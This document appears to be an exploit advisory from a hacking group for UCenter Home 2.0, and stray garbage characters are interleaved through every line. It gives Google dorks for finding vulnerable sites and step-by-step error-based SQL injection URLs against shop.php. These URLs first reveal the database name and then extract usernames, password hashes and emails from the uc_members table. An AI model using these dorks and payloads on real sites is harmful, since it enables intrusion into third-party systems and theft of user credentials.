6 W+ t5 f' P# K; L( F; A__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ) x1 ?" \+ z/ O4 z2 x/ i6 r
- {+ A2 Y* `) `4 g5 k" Q2 }6 i6 m: s 3 t' \0 E5 u) {, |9 }8 a1 ?4 Y! ^6 T
. L- k9 V/ h V3 u0 j0 Y*/ Author : KnocKout
+ ~: \( T, x% I
; k1 }) s( i! j- E7 T, A' f: p/ l*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
' C% D, _! c8 j. x
+ [; |7 V9 k5 r7 S*/ Contact: knockoutr@msn.com
4 v) _: [' S. C6 p- b6 i, C0 M5 f
. l$ ^9 B, ]+ r" r, }, Y5 S0 A4 p1 v*/ Cyber-Warrior.org/CWKnocKout 3 |8 E: A; h# ?1 t
: m( q6 y- a/ o& k__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 B* m! }) G3 j4 l" y/ A @ [) m) T& J# V: N
Script : UCenter Home # g6 b- K' L) J
9 G8 ^3 {( D3 w# D' u4 m4 N4 F' x
Version : 2.0 3 X3 P) c! H5 W! J1 d
5 ?& z& l, A& o" }Script HomePage : http://u.discuz.net/
# {! w( B9 ~; O4 L0 @2 o5 c! m8 w3 s D! N+ s% r+ `1 C' m+ z% ?! M( y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 E+ _5 O; l; a& H/ I/ v8 p
* f; I7 q+ D% G' R8 X- h$ _( g& r( k
Dork : Powered by UCenter inurl:shop.php?ac=view & N6 Q- h) a- ]" h7 O2 [
8 X0 b; V A7 M3 n" r' rDork 2 : inurl:shop.php?ac=view&shopid=
) {8 i: S" m0 t" N* _$ N5 g
/ z0 C# I1 {& i# h) a7 N) G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ t0 d$ \4 ~! ]9 \1 t3 t/ s3 B
/ Z# H1 v9 l9 |Vuln file : Shop.php
7 l3 {# x h7 @, P6 Q; j
1 ~7 s+ n/ k8 |% J0 x& R1 i0 R9 Yvalue's : (?)ac=view&shopid= ( N e- l0 w1 c2 K
) X9 ?4 V$ O8 \
Vulnerable Style : SQL Injection (MySQL Error Based) # |6 ]6 A$ }% `% D
: ?# T+ {* m S. b `2 C4 \Need Metarials : Hex Conversion / Y. G0 u& u0 }9 ^0 \% j5 L
3 n" ^/ c1 ^3 d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== a) L* U6 J- {# U% B( s! H
* p6 j+ k' D; V0 A) m6 f8 p4 ^
Your Need victim Database name.
+ c/ b3 P5 e6 Q4 z8 c: {
$ w" d3 N+ N3 o) N7 Y* Tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 q% }& _' o1 a
: E! Z( o8 _9 b4 w.. 3 k4 U/ O- q7 b, ~, f" p
1 f& B$ T: {8 `: Y' y! E2 a) t7 M
DB : Okey.
1 r; v j5 T, s2 A9 j* D; X' ?8 u$ T$ p" \1 b
your edit DB `[TARGET DB NAME]` 8 P+ x; }- G, B7 p) B
& l: n0 x4 i1 G2 D/ v0 o- S* `8 f
Example : 'hiwir1_ucenter' $ k# E) V( S, L/ D7 b) t# v0 G
" u8 R$ t( C0 @; `" i. EEdit : Okey.
) j, W7 l. [! f3 x
' x6 T7 ~; g# S4 h% MYour use Hex conversion. And edit Your SQL Injection Exploit..
' r2 K/ J) s# Z& `4 q6 k3 U; f5 [4 |1 D" ? T
! s" p. E# z# G% Y @8 G
3 G8 z5 C/ t) y2 J2 H- ]& jExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 ]7 |: F; a+ g2 C& V1 N4 D
|